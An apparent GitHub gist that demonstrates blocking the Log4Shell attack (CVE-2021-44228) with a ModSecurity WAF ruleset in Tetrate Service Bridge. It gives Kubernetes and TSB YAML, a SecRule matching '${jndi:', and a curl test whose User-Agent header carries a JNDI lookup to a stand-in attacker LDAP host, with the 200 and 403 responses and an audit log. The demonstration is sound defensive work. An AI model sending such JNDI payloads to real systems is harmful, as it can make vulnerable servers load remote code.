Last active
January 5, 2022 07:58
-
-
Save incfly/83280d041c8d2928d5e15403f4b9b86e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -H “Host: httpbin.tetrate.com” -H “User-Agent: ${JNDI://ldap://evial.xx/path}” \ | |
–resolve “httpbin.tetrate.com:${GATEWAY_IP}” httpbin.tetrate.com/headers | |
< HTTP/1.1 200 OK | |
< server: envoy | |
< date: Tue, 28 Dec 2021 05:48:57 GMT | |
< content-type: application/json | |
< content-length: 28 | |
< access-control-allow-origin: * | |
< access-control-allow-credentials: true | |
< x-envoy-upstream-service-time: 25 | |
< | |
{ | |
"origin": "127.0.0.1" | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
kubectl apply -f https://raw.githubusercontent.com/istio/istio/master/samples/httpbin/httpbin.yaml | |
tctl apply -f ./ingress.yaml |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
kubectl apply -f ./waf.yaml |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apiVersion: security.tsb.tetrate.io/v2 | |
kind: Group | |
metadata: | |
name: t1 | |
workspace: w1 | |
tenant: mycompany | |
organization: myorg | |
spec: | |
namespaceSelector: | |
names: | |
- "*/default" | |
configMode: BRIDGED | |
--- | |
apiVersion: security.tsb.tetrate.io/v2 | |
kind: SecuritySetting | |
metadata: | |
name: defaults | |
group: t1 | |
workspace: w1 | |
tenant: mycompany | |
organization: myorg | |
spec: | |
wafSettings: | |
ruleSets: | |
- block-log4j |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apiVersion: security.tsb.tetrate.io/v2 | |
kind: WafRuleset | |
metadata: | |
name: block-log4j | |
organization: myorg | |
spec: | |
displayName: "Block Log4j Shell Attack" | |
description: "Block traffic containing the special substring that can leads to remote execution attack." | |
ruleSet: | | |
SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML://*|XML://@* \ | |
\"@rx \\${jndi:\" \ | |
\"phase:4,id:9455,deny,status:403,msg:'Potential Remote Command Execution: Log4j CVE-2021-44228'\"" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -H “Host: httpbin.tetrate.com” -H “User-Agent: ${JNDI://ldap://evial.xx/path} \ | |
–resolve “httpbin.tetrate.com:${GATEWAY_IP}” httpbin.tetrate.com/headers | |
< HTTP/1.1 403 Forbidden | |
< date: Tue, 28 Dec 2021 04:42:26 GMT | |
< server: envoy | |
< content-length: 0 | |
< x-envoy-upstream-service-time: 29 | |
< | |
* Connection #0 to host httpbin left intact. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
2021-12-28T04:42:26.357217Z error envoy wasm wasm log: [extensions/modsecurity/plugin.cc:563]::doDisruptiveAction() | |
[audit log][client 10.60.0.16] ModSecurity: Access denied with code 403 (phase 4). | |
Matched "Operator Rx' with parameter jndi' against variable REQUEST_HEADERS:foo' (Value: jndi' ) | |
[file "<<reference missing or not informed>>"] [line "9"] [id "9455"] [rev ""] | |
[msg "Potential Remote Command Execution: Log4j CVE-2021-44228"] | |
[data ""] [severity "0"] [ver ""] [maturity "0"] [accuracy "0"] [hostname "10.60.2.158"] | |
[uri "/ip"] [unique_id "1640666546"] [ref "o0,4v90,4"] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apiVersion: gateway.tsb.tetrate.io/v2 | |
kind: IngressGateway | |
Metadata: | |
organization: tetrate | |
name: httpbin-gw-ingress | |
group: httpbin-gw | |
workspace: httpbin-ws | |
tenant: tetrate | |
spec: | |
workloadSelector: | |
namespace: default | |
labels: | |
app: tsb-gateway-httpbin | |
http: | |
- name: httpbin | |
port: 8000 | |
hostname: "httpbin.tetrate.com" | |
routing: | |
rules: | |
- route: | |
host: "default/httpbin.default.svc.cluster.local" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment